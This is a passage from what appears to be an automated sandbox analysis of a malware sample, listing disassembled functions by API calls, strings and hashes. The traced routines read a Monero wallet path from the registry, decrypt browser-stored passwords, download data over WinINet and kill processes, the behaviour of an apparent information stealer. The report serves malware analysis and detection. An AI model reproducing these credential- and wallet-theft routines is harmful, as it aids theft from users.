                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: dac446079211f9546f949b45ab0f0173cd26a20d761e9d19f1a525489ca3a401
                                • Instruction ID: 64425579d573fa919845d92169f21ab04187fc79bb8cc550adaeb73eb9a387ca
                                • Opcode Fuzzy Hash: dac446079211f9546f949b45ab0f0173cd26a20d761e9d19f1a525489ca3a401
                                • Instruction Fuzzy Hash: F9711FB5D0021DABDB10DF95DD84AEEF7B9EF48310F10466AE609A7200EA356E85CB91
                                Function 009B1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 009B1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 009B1173
                                • RegCloseKey.ADVAPI32(?), ref: 009B117D
                                Strings
                                • wallet_path, xrefs: 009B116D
                                • SOFTWARE\monero-project\monero-core, xrefs: 009B114F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 8c4ca768a35ac5cedb36df57ec9d479a61e86bd7e509b1d180596e39ab332ba8
                                • Instruction ID: 49f99a66facdbd743f86eddd50677ac5ac3cce225dad05de456c87a1897943c2
                                • Opcode Fuzzy Hash: 8c4ca768a35ac5cedb36df57ec9d479a61e86bd7e509b1d180596e39ab332ba8
                                • Instruction Fuzzy Hash: F9F03075640388BBD7109BE5AC8DFEA7B7CEB44B15F100154FE09E7281EAB05A4887A0
                                Function 009B9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 009B9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 009B9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 009B9EA7
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • lstrcpy.KERNEL32(00000000,009E4C48), ref: 009B9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 965af9446fc930325ad7b424b1ee8dc9555f63790cad0aca1e79b42ef4925356
                                • Instruction ID: b894068a8d1753613b833d3435b7e361da3ff798e8e3ba536e4d2876a890c8e3
                                • Opcode Fuzzy Hash: 965af9446fc930325ad7b424b1ee8dc9555f63790cad0aca1e79b42ef4925356
                                • Instruction Fuzzy Hash: 0A51B331A102499BDB10EFA9DE85BDE77A8EF80334F154465FA49EB281DB70ED058BD0
                                Function 009B5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009B565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B5661
                                • InternetOpenA.WININET(009DCFEC,00000000,00000000,00000000,00000000), ref: 009B5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 009B5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 009B56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 009B56E1
                                • InternetCloseHandle.WININET(?), ref: 009B56FA
                                • InternetCloseHandle.WININET(00000000), ref: 009B5701
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 51001a10cd3bd46b7470270f3281361981527272d563eeb3fcfb9284356e6f8d
                                • Instruction ID: a1ef8fdff50e4eef98a6b61fe06ce98259f4b1e745609c53c467fa2e7f84e421
                                • Opcode Fuzzy Hash: 51001a10cd3bd46b7470270f3281361981527272d563eeb3fcfb9284356e6f8d
                                • Instruction Fuzzy Hash: 72417F70A00605EFDB24CF55DD88FDAB7B8FF48714F1580A9E9089B2A1DB719D42CB94
                                Function 009D4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 009D4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 009D47AB
                                • CloseHandle.KERNEL32(00000000), ref: 009D47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D47C0
                                • CloseHandle.KERNEL32(00000000), ref: 009D47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 3f61f905b37fe67889408b46e00c960a358644bf9320eb3035f974b4e8cbabbc
                                • Instruction ID: c58d094b923a5df056f212745f82f84528a389b40511e4700bba1a79a20fa69e
                                • Opcode Fuzzy Hash: 3f61f905b37fe67889408b46e00c960a358644bf9320eb3035f974b4e8cbabbc
                                • Instruction Fuzzy Hash: 7901B571681614ABE7209B609CC9FEE77BCEB48752F004581F909EA281EF708D848AA0
                                Function 009C83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C846C
                                • lstrlen.KERNEL32(00000000), ref: 009C84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C84E9
                                • lstrlen.KERNEL32(00000000), ref: 009C84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C852E
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 72bd1275c094d01950ff1f7d3654a43a8212a5d9eb19cd46c08ea90b080b479b
                                • Instruction ID: c0a465a4986bf5d0b464348967c3e671f5a4bd664fa510fe8e2a9cb0f09e6379
                                • Opcode Fuzzy Hash: 72bd1275c094d01950ff1f7d3654a43a8212a5d9eb19cd46c08ea90b080b479b
                                • Instruction Fuzzy Hash: A8515B719002429FCB24DF68D984F9BB7B9EF84310B25849DE846EB255EF70E9418B91
                                Function 009D2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009D2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D292C
                                • RegOpenKeyExA.ADVAPI32(80000002,010BBDA8,00000000,00020119,009D28A9), ref: 009D294B
                                • RegQueryValueExA.ADVAPI32(009D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 009D2965
                                • RegCloseKey.ADVAPI32(009D28A9), ref: 009D296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: a422eeb27c327e91e451009d5edf9ff80c4c74ecf67ba219114039c1850cbaac
                                • Instruction ID: 79f7328b64e61b575091c8f5b416926816f7340cbd8fa3ac7a363092c3cf8d8f
                                • Opcode Fuzzy Hash: a422eeb27c327e91e451009d5edf9ff80c4c74ecf67ba219114039c1850cbaac
                                • Instruction Fuzzy Hash: AA01D475640394ABD320CBA0DC99FFB7BBCEB48755F104059FE49DB341EA3159088790
                                Function 009D2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009D2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D289C
                                  • Part of subcall function 009D2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009D2925
                                  • Part of subcall function 009D2910: RtlAllocateHeap.NTDLL(00000000), ref: 009D292C
                                  • Part of subcall function 009D2910: RegOpenKeyExA.ADVAPI32(80000002,010BBDA8,00000000,00020119,009D28A9), ref: 009D294B
                                  • Part of subcall function 009D2910: RegQueryValueExA.ADVAPI32(009D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 009D2965
                                  • Part of subcall function 009D2910: RegCloseKey.ADVAPI32(009D28A9), ref: 009D296F
                                • RegOpenKeyExA.ADVAPI32(80000002,010BBDA8,00000000,00020119,009C9500), ref: 009D28D1
                                • RegQueryValueExA.ADVAPI32(009C9500,010CE978,00000000,00000000,00000000,000000FF), ref: 009D28EC
                                • RegCloseKey.ADVAPI32(009C9500), ref: 009D28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 09feef2c4746cce558ed08ae73e24cd669baf28e887aac666819402d0de7a847
                                • Instruction ID: 6af4d17866543d7fa2b99ddc72605cf4d16ffe8b669dc724e12f1c4bc6160c05
                                • Opcode Fuzzy Hash: 09feef2c4746cce558ed08ae73e24cd669baf28e887aac666819402d0de7a847
                                • Instruction Fuzzy Hash: A601A271640248BBD720DBA4AC89FAA777DEB44316F004555FE08DB391DE70594497E0
                                Function 009B71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 009B723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 009B7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009B72C3
                                • HeapFree.KERNEL32(00000000), ref: 009B72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 009B7329
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: e88904bff31029d739d9da437cd07bad91f8868f4c90b10217937e6bae749b3c
                                • Instruction ID: e032791677cf0e43bc305b584c467034287bfa893f4d27df99aec4ecbd8b70fd
                                • Opcode Fuzzy Hash: e88904bff31029d739d9da437cd07bad91f8868f4c90b10217937e6bae749b3c
                                • Instruction Fuzzy Hash: 7C413C717056069BDB20CFA9ED84BEAF3E8EB84325F1446A9EC5DCB351E631E9009B50
                                Function 009CD7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 009CD7D6
                                • RegOpenKeyExA.ADVAPI32(80000001,010CDD30,00000000,00020119,?), ref: 009CD7F5
                                • RegQueryValueExA.ADVAPI32(?,010CED08,00000000,00000000,00000000,000000FF), ref: 009CD819
                                • RegCloseKey.ADVAPI32(?), ref: 009CD823
                                • lstrcat.KERNEL32(?,00000000), ref: 009CD848
                                • lstrcat.KERNEL32(?,010CEE88), ref: 009CD85C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
